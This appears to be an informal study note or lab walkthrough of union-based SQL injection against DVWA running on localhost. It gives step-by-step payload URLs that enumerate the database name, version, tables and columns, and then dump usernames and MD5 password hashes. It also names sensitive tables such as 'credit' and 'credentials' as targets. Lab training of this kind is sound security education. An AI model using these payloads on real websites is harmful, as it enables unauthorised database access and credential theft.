Untitled

1.	Injection
2.	=========
3.
4.	Basic SQL Injection -> Authentication Bypass
5.
6.	Union Based Injection ->
7.	=====================
8.
9.	Technology -> php
10.	Database -> MySQL
11.
12.	Entering arbitrary|unwanted sql string from the front end of the website. and fetching data from the  database i.e Backend
13.
14.	All queries are be tried in "URL" of the website
15.
16.	Steps to do  penetration testing using: UNION BAED SQL INJECTION
17.
18.	Target -> Get Access to complete Database
19.
20.	Database -> Collection of Tables -> Collection of Columns -> Collection of data
21.
22.
23.
24.	DVWA -> LOW LEVEL
25.
26.	Step 1: Find GET Method in Website
27.
28.	In url:
29.
30.	?id=4
31.	?pid=8
32.	?username=palvinder
33.	?product=chips
34.
35.	?something=sommething
36.
37.	By clicking every possible link, available on the website
38.	BY trying every option on website. Eg. Search, Submit, Comment etc
39.
40.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4&Submit=Submit#
41.
42.	Step 2: Check Exception Handling or Check website is vulnerable of Not
43.
44.	?id=4'
45.
46.	Website show any error (MySQL, Missing Images, Corrupt, Videos Error)
47.
48.	Any change in webiste, site is vulnerable
49.
50.	Step 3: Check number s
51.
52.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' order by 1--+&Submit=Submit#
53.
54.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' order by 2--+&Submit=Submit#
55.
56.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' order by 3--+&Submit=Submit#    ====>>>> Error
57.
58.	Columns = 2
59.
60.	Step 4: Select all columns
61.
62.	select 1,2--+
63.
64.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select 1,2--+&Submit=Submit#
65.
66.	==>> It will be showing all vulnerable columns, from which we can get data from database
67.
68.	Random = 1 , 2 , or Both
69.
70.	Those Columns number are vulnerable
71.
72.	Step 5: Getting Name of Database:
73.
74.	database()
75.
76.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select database(),2--+&Submit=Submit#
77.
78.	Name of Database = dvwa
79.
80.	Step 6: Version of Database
81.
82.	version()
83.
84.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select version(),2--+&Submit=Submit#
85.
86.	Step 7: Get Table Name
87.
88.	select 1,2--+
89.
90.	select table_name,2 from information_schema.tables--+
91.
92.	information_schema = Mother of database
93.
94.	Knowledge of complete database
95.
96.	Tables = information_schema.tables
97.
98.	Columns = information_schema.columns
99.
100.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select table_name,2 from information_schema.tables--+&Submit=Submit#
101.
102.	List of All Table from Database: :)
103.
104.	We have to choose those table name-> Sensitive Information
105.
106.	Eg:
107.
108.	credit
109.	debit
110.	password
111.	login
112.	users
113.	credentials
114.
115.	Table Name= users
116.
117.
118.	Step 8: We have to get Column Name of "users" table
119.
120.
121.	select column_name,2 from information_schema.columns where table_name="users"--+
122.
123.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select column_name,2 from information_schema.columns where table_name="users"--+&Submit=Submit#
124.
125.	==> List of all columns, of "users" table
126.
127.	Columns Name = user and password
128.
129.	Step 9: DATA from Respective Columns of Particular Table
130.
131.	http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=4' union select user,password from users--+&Submit=Submit#
132.
133.	username = Getting in brain
134.
135.	password = flying over the brain (Encrypted)
136.
137.	MD5 Encryption =
138.
139.	HexDecimal (0-9,a-f)
140.
141.	32 Characters